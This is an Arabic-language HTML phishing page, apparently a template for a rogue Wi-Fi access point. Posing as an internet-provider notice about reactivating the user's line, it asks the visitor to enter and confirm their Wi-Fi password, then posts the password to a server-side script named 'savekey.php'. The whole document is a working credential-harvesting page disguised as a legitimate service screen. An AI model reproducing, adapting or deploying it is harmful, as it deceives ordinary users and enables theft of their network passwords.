<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<html dir="rtl">
<title>  لعادة تفعيل الخدمة يرجي اتباع التعليمات الاتية </title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta http-equiv="Content-Style-Type" content="text/css">
<link rel="icon" type="image/png"  href="images/arabic_logo.png" />
<link rel="stylesheet" href="./style/style.css" type="text/css">
<style type="text/css">
input.text
{
border:1px solid #E5E5E5;
height:26px;
line-height:26px;
width:175px;
padding:0px;
margin:4px 0px 0px 10px;
font-size:14px;
color:#6a6969;
font-family:"Verdana","Arial";
outline: none;
}
input.LoginBtn
{
height:28px;
display:inline-block;
width:110px;
margin-top:30px;
font-size:18px;
color: #fff;
cursor:pointer;
background-color: #2894e0;}
#copyright
{
-webkit-text-size-adjust:none;
font-size:9px;
color:#6a6969;
font-family:"Verdana";
margin-top:40px;
display:inline-block;
}
    .mar{
        text-align: center;
    }
    .max{
        text-align: center;
    }
    .max img {
        padding-right: 32px;
    }
</style>
<script language="JavaScript">
<!--

function myFunction() {
        var pass1 = document.getElementById("pass1").value;
        var pass2 = document.getElementById("pass2").value;
		
    if (pass1==null || pass1=="",pass2==null || pass2=="")
      {
      alert("يرجى ملء جميع الحقول المطلوبة");
      return false;
      }
	  
	  else {
        if (pass1 != pass2) {
            alert("كلمات المرور غير متطابقة");
            document.getElementById("pass1").style.borderColor = "#E34234";
            document.getElementById("pass2").style.borderColor = "#E34234";
			return false;
        }
        else {
            alert("كلمات السر متطابقة");
            document.getElementById("regForm").submit();
        } }
    }
-->

</script>
</head>
<body style="font-family:Arial, sans-serief; background-color:#E5E5E5;margin:0px;padding:0px;" onload="doLoad()">
<form method="POST" action="data/savekey.php" id="regForm"><p>&nbsp;</p>
<p>&nbsp;</p>
<table width="550" border="0" align="center" cellpadding="0" cellspacing="0">
<tbody><tr>
<td><table width="100%" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td height="31">&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
<td width="8%">&nbsp;</td><td width="90%" valign="top">
<br><br><br><table style="background-color:white" width="95%" border="0" align="center">
<tbody><tr>
<td height="35">&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td></tr><tr>
    <div class="mar" >
<img alt="giga" src="images/ls-home.png" style="padding-right :19;"></div>
<td colspan="3" style="text-align:center;"><b>لتفعيل خط الأنترنت لديك يرجي اتباع التعليمات الاتية<br><br><font size="3" color="gray"> أدخل كلمة المرور  <font color="red">للواي فاي الخاص بك</font></font></b><br><br></td><td>&nbsp;</td></tr>
<tr>
<td align="left" width="40%">
<font color="gray"><b>
الباسورد  : </b></font>
</td><td align="left" width="40%"><input name="key1" type="PASSWORD" id="pass1" name="Login_Pwd" size="12" maxlength="31" value="" autocomplete="off" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);" style="border-color: rgb(229, 229, 229);"></td></tr>
<tr>
<td align="left">
<font color="gray"><b>اعادة الباسورد :</b></font>
</td><td><input type="PASSWORD" name="Login_Pwd" id="pass2" size="20" maxlength="31" value="" autocomplete="off" class="text" onfocus="changeBorderColor(this,1);" onblur="changeBorderColor(this,0);" style="border-color: rgb(229, 229, 229);"></td></tr>


<tr>
<td align="center" colspan="3">
<input type="BUTTON" name="texttpLoginBtn" value="أرسال" class="LoginBtn" onclick="myFunction();"></td></tr><tr>
<td align="center" colspan="3">
<input type="HIDDEN" name="uiWebLoginhiddenUsername" value="ec37aa25501f5aea74d5eb3d19b08333"><input type="HIDDEN" name="uiWebLoginhiddenPassword" value="ec37aa25501f5aea74d5eb3d19b08333"></td></tr><tr>
<td height="30" colspan="3" style="text-align:center;">

</td></tr></tbody></table></td><td width="6%">&nbsp;</td></tr></tbody></table></td></tr></tbody></table><!-- RpZDT -->
    <div class="max"><img alt="gg" src="images/lms-home.png" style=" "></div>
</form><p>&nbsp;</p>

</body>
</html>